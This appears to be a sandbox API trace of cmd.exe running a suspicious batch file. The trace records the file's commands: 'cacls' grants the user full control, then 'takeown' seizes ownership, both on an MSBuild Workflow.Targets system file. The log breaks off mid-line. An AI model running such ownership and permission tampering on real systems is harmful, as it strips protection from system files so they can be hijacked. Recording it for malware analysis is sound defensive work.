[0157.958] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.958] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x31f4d8, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x31f4d8*=0xe2, lpOverlapped=0x0) returned 1 [0157.959] SetFilePointer (in: hFile=0x78, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0157.959] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=32, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="cacls %1 /E /G %USERNAME%:F /C\r\n") returned 32 [0157.961] _get_osfhandle (_FileHandle=3) returned 0x78 [0157.961] GetFileType (hFile=0x78) returned 0x1 [0157.961] _get_osfhandle (_FileHandle=3) returned 0x78 [0157.961] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0157.961] GetProcessHeap () returned 0x3a0000 [0157.962] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x400a) returned 0x3b6370 [0157.962] GetProcessHeap () returned 0x3a0000 [0157.962] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x4008) returned 0x3c43a8 [0157.962] GetProcessHeap () returned 0x3a0000 [0157.962] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x1a) returned 0x3a0880 [0157.962] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="5p5NrGJn0jS HALPmcxz") returned 0x14 [0157.962] GetProcessHeap () returned 0x3a0000 [0157.962] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3a0880 | out: hHeap=0x3a0000) returned 1 [0157.962] GetProcessHeap () returned 0x3a0000 [0157.962] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3c43a8 | out: hHeap=0x3a0000) returned 1 [0157.962] GetProcessHeap () returned 0x3a0000 [0157.963] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b6370 | out: hHeap=0x3a0000) returned 1 [0157.963] _wcsicmp (_String1="cacls", _String2=")") returned 58 [0158.166] _wcsicmp (_String1="FOR", _String2="cacls") returned 3 [0158.166] _wcsicmp (_String1="FOR/?", _String2="cacls") returned 3 [0158.167] _wcsicmp (_String1="IF", _String2="cacls") returned 6 [0158.167] _wcsicmp (_String1="IF/?", _String2="cacls") returned 6 [0158.167] _wcsicmp (_String1="REM", _String2="cacls") returned 15 [0158.167] _wcsicmp (_String1="REM/?", _String2="cacls") returned 15 [0158.167] GetProcessHeap () returned 0x3a0000 [0158.167] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x58) returned 0x3b4ac0 [0158.167] GetProcessHeap () returned 0x3a0000 [0158.167] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x14) returned 0x3af538 [0158.172] _tell (_FileHandle=3) returned 32 [0158.172] _close (_FileHandle=3) returned 0 [0158.172] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x31f2ac | out: _Buffer="\r\n") returned 2 [0158.173] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.173] GetFileType (hFile=0x7) returned 0x2 [0158.173] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0158.173] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x31f26c | out: lpMode=0x31f26c) returned 1 [0158.174] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.174] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x31f298, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x31f298*=0x2) returned 1 [0158.175] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0158.175] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0158.175] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x31f2a8 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0158.175] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x31f2a8 | out: _Buffer=">") returned 1 [0158.175] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.175] GetFileType (hFile=0x7) returned 0x2 [0158.176] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0158.176] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x31f270 | out: lpMode=0x31f270) returned 1 [0158.176] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.176] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x31f29c, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x31f29c*=0x26) returned 1 [0158.177] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.177] GetFileType (hFile=0x7) returned 0x2 [0158.178] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0158.178] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x31f4f4 | out: lpMode=0x31f4f4) returned 1 [0158.178] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.179] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x3af540*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x31f520, lpReserved=0x0 | out: lpBuffer=0x3af540*, lpNumberOfCharsWritten=0x31f520*=0x5) returned 1 [0158.179] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x31f52c | out: _Buffer=" \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\" /E /G 5p5NrGJn0jS HALPmcxz:F /C ") returned 120 [0158.179] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.179] GetFileType (hFile=0x7) returned 0x2 [0158.180] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0158.180] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x31f4ec | out: lpMode=0x31f4ec) returned 1 [0158.180] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.180] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x78, lpNumberOfCharsWritten=0x31f518, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x31f518*=0x78) returned 1 [0158.181] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x31f54c | out: _Buffer="\r\n") returned 2 [0158.181] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.181] GetFileType (hFile=0x7) returned 0x2 [0158.181] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0158.181] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x31f50c | out: lpMode=0x31f50c) returned 1 [0158.181] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.181] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x31f538, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x31f538*=0x2) returned 1 [0158.182] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0158.182] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0158.182] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0158.182] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0158.182] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0158.182] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0158.182] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0158.182] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0158.182] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0158.182] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0158.182] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0158.182] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0158.182] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0158.182] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0158.182] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0158.183] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0158.183] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0158.183] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0158.183] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0158.183] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0158.183] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0158.183] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0158.183] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0158.183] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0158.183] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0158.183] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0158.183] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0158.183] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0158.183] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0158.183] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0158.183] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0158.183] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0158.183] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0158.183] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0158.183] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0158.183] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0158.183] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0158.183] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0158.183] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0158.183] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0158.183] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0158.184] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0158.184] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0158.184] GetProcessHeap () returned 0x3a0000 [0158.184] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x418) returned 0x3b4c20 [0158.184] SetErrorMode (uMode=0x0) returned 0x0 [0158.184] SetErrorMode (uMode=0x1) returned 0x0 [0158.184] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3b4c28, lpFilePart=0x31f2f0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x31f2f0*="Desktop") returned 0x25 [0158.184] SetErrorMode (uMode=0x0) returned 0x1 [0158.184] GetProcessHeap () returned 0x3a0000 [0158.184] RtlReAllocateHeap (Heap=0x3a0000, Flags=0x0, Ptr=0x3b4c20, Size=0x60) returned 0x3b4c20 [0158.185] GetProcessHeap () returned 0x3a0000 [0158.185] RtlSizeHeap (HeapHandle=0x3a0000, Flags=0x0, MemoryPointer=0x3b4c20) returned 0x60 [0158.185] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0158.185] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0158.185] GetProcessHeap () returned 0x3a0000 [0158.185] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x120) returned 0x3b4c88 [0158.185] GetProcessHeap () returned 0x3a0000 [0158.185] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x238) returned 0x3b4db0 [0158.189] GetConsoleTitleW (in: lpConsoleTitle=0x31f0bc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0158.190] GetConsoleTitleW (in: lpConsoleTitle=0x31ee50, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0158.190] InitializeProcThreadAttributeList (in: lpAttributeList=0x31ecd8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x31eda0 | out: lpAttributeList=0x31ecd8, lpSize=0x31eda0) returned 1 [0158.190] UpdateProcThreadAttribute (in: lpAttributeList=0x31ecd8, dwFlags=0x0, Attribute=0x60001, lpValue=0x31ed98, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x31ecd8, lpPreviousValue=0x0) returned 1 [0158.190] GetStartupInfoW (in: lpStartupInfo=0x31ec94 | out: lpStartupInfo=0x31ec94*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0158.541] CloseHandle (hObject=0x78) returned 1 [0158.541] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0158.541] GetProcessHeap () returned 0x3a0000 [0158.541] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b5830 | out: hHeap=0x3a0000) returned 1 [0158.541] GetEnvironmentStringsW () returned 0x3b5710* [0158.541] GetProcessHeap () returned 0x3a0000 [0158.541] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0xb36) returned 0x3b6250 [0158.541] FreeEnvironmentStringsW (penv=0x3b5710) returned 1 [0158.541] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0171.133] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x31ec74 | out: lpExitCode=0x31ec74*=0x1f57) returned 1 [0171.134] CloseHandle (hObject=0x74) returned 1 [0171.134] _vsnwprintf (in: _Buffer=0x31edbc, _BufferCount=0x13, _Format="%08X", _ArgList=0x31ec80 | out: _Buffer="00001F57") returned 8 [0171.134] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00001F57") returned 1 [0171.134] GetProcessHeap () returned 0x3a0000 [0171.134] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b6250 | out: hHeap=0x3a0000) returned 1 [0171.134] GetEnvironmentStringsW () returned 0x3b5710* [0171.134] GetProcessHeap () returned 0x3a0000 [0171.134] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0xb5c) returned 0x3b78f8 [0171.134] FreeEnvironmentStringsW (penv=0x3b5710) returned 1 [0171.134] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0171.134] GetProcessHeap () returned 0x3a0000 [0171.134] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b78f8 | out: hHeap=0x3a0000) returned 1 [0171.135] GetEnvironmentStringsW () returned 0x3b5710* [0171.135] GetProcessHeap () returned 0x3a0000 [0171.135] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0xb5c) returned 0x3b78f8 [0171.135] FreeEnvironmentStringsW (penv=0x3b5710) returned 1 [0171.135] GetProcessHeap () returned 0x3a0000 [0171.135] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b4540 | out: hHeap=0x3a0000) returned 1 [0171.135] DeleteProcThreadAttributeList (in: lpAttributeList=0x31ecd8 | out: lpAttributeList=0x31ecd8) [0171.135] _get_osfhandle (_FileHandle=1) returned 0x7 [0171.135] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0171.136] _get_osfhandle (_FileHandle=1) returned 0x7 [0171.136] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0171.136] _get_osfhandle (_FileHandle=0) returned 0x3 [0171.137] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0171.137] SetConsoleInputExeNameW () returned 0x1 [0171.137] GetConsoleOutputCP () returned 0x1b5 [0171.137] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0171.137] SetThreadUILanguage (LangId=0x0) returned 0x409 [0171.137] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x31f4f4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0171.138] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0171.138] _get_osfhandle (_FileHandle=3) returned 0x74 [0171.138] SetFilePointer (in: hFile=0x74, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0171.138] GetProcessHeap () returned 0x3a0000 [0171.139] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b5548 | out: hHeap=0x3a0000) returned 1 [0171.139] GetProcessHeap () returned 0x3a0000 [0171.139] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b5418 | out: hHeap=0x3a0000) returned 1 [0171.139] GetProcessHeap () returned 0x3a0000 [0171.139] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b52f0 | out: hHeap=0x3a0000) returned 1 [0171.139] GetProcessHeap () returned 0x3a0000 [0171.139] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b5288 | out: hHeap=0x3a0000) returned 1 [0171.139] GetProcessHeap () returned 0x3a0000 [0171.139] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b5178 | out: hHeap=0x3a0000) returned 1 [0171.139] GetProcessHeap () returned 0x3a0000 [0171.139] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b4f60 | out: hHeap=0x3a0000) returned 1 [0171.139] GetProcessHeap () returned 0x3a0000 [0171.139] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b4ee0 | out: hHeap=0x3a0000) returned 1 [0171.139] GetProcessHeap () returned 0x3a0000 [0171.139] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b4db0 | out: hHeap=0x3a0000) returned 1 [0171.139] GetProcessHeap () returned 0x3a0000 [0171.139] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b4c88 | out: hHeap=0x3a0000) returned 1 [0171.139] GetProcessHeap () returned 0x3a0000 [0171.139] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b4c20 | out: hHeap=0x3a0000) returned 1 [0171.139] GetProcessHeap () returned 0x3a0000 [0171.139] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b4b20 | out: hHeap=0x3a0000) returned 1 [0171.139] GetProcessHeap () returned 0x3a0000 [0171.140] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3af538 | out: hHeap=0x3a0000) returned 1 [0171.140] GetProcessHeap () returned 0x3a0000 [0171.140] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b4ac0 | out: hHeap=0x3a0000) returned 1 [0171.140] _get_osfhandle (_FileHandle=3) returned 0x74 [0171.140] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0171.140] ReadFile (in: hFile=0x74, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x31f4d8, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x31f4d8*=0xc2, lpOverlapped=0x0) returned 1 [0171.142] SetFilePointer (in: hFile=0x74, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0171.142] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=15, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="takeown /F %1\r\n%USERNAME%:F /C\r\n") returned 15 [0171.142] _get_osfhandle (_FileHandle=3) returned 0x74 [0171.142] GetFileType (hFile=0x74) returned 0x1 [0171.143] _get_osfhandle (_FileHandle=3) returned 0x74 [0171.143] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0171.143] GetProcessHeap () returned 0x3a0000 [0171.143] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x400a) returned 0x3c43a8 [0171.143] GetProcessHeap () returned 0x3a0000 [0171.143] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3c43a8 | out: hHeap=0x3a0000) returned 1 [0171.145] _tell (_FileHandle=3) returned 47 [0171.146] _close (_FileHandle=3) returned 0 [0171.146] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x31f2ac | out: _Buffer="\r\n") returned 2 [0171.146] _get_osfhandle (_FileHandle=1) returned 0x7 [0171.146] GetFileType (hFile=0x7) returned 0x2 [0171.146] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0171.146] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x31f26c | out: lpMode=0x31f26c) returned 1 [0171.147] _get_osfhandle (_FileHandle=1) returned 0x7 [0171.147] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x31f298, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x31f298*=0x2) returned 1 [0171.865] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0171.865] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0171.865] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x31f2a8 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0171.865] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x31f2a8 | out: _Buffer=">") returned 1 [0171.865] _get_osfhandle (_FileHandle=1) returned 0x7 [0171.865] GetFileType (hFile=0x7) returned 0x2 [0171.866] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0171.866] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x31f270 | out: lpMode=0x31f270) returned 1 [0171.866] _get_osfhandle (_FileHandle=1) returned 0x7 [0171.866] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x31f29c, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x31f29c*=0x26) returned 1 [0171.867] _get_osfhandle (_FileHandle=1) returned 0x7 [0171.867] GetFileType (hFile=0x7) returned 0x2 [0171.867] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0171.867] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x31f4f4 | out: lpMode=0x31f4f4) returned 1 [0171.868] _get_osfhandle (_FileHandle=1) returned 0x7 [0171.868] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x3af540*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x31f520, lpReserved=0x0 | out: lpBuffer=0x3af540*, lpNumberOfCharsWritten=0x31f520*=0x7) returned 1 [0171.868] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x31f52c | out: _Buffer=" /F \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\" ") returned 91 [0171.868] _get_osfhandle (_FileHandle=1) returned 0x7 [0171.868] GetFileType (hFile=0x7) returned 0x2 [0171.869] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0171.869] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x31f4ec | out: lpMode=0x31f4ec) returned 1 [0171.869] _get_osfhandle (_FileHandle=1) returned 0x7 [0171.869] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x5b, lpNumberOfCharsWritten=0x31f518, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x31f518*=0x5b) returned 1 [0171.871] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x31f54c | out: _Buffer="\r\n") returned 2 [0171.871] _get_osfhandle (_FileHandle=1) returned 0x7 [0171.871] GetFileType (hFile=0x7) returned 0x2 [0171.871] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0171.872] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x31f50c | out: lpMode=0x31f50c) returned 1 [0171.872] _get_osfhandle (_FileHandle=1) returned 0x7 [0171.872] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x31f538, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x31f538*=0x2) returned 1 [0171.874] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0171.874] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0171.874] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0171.874] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0171.874] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0171.874] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0171.874] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0171.874] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0171.874] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0171.874] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0171.874] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0171.874] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0171.874] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0171.874] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0171.874] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0171.874] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0171.874] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0171.874] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0171.875] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0171.875] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0171.875] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0171.875] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0171.875] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0171.875] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0171.875] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0171.875] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0171.875] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0171.875] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0171.875] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0171.875] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0171.875] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0171.875] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0171.876] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0171.876] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0171.876] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0171.876] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0171.876] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0171.876] _wcsicmp 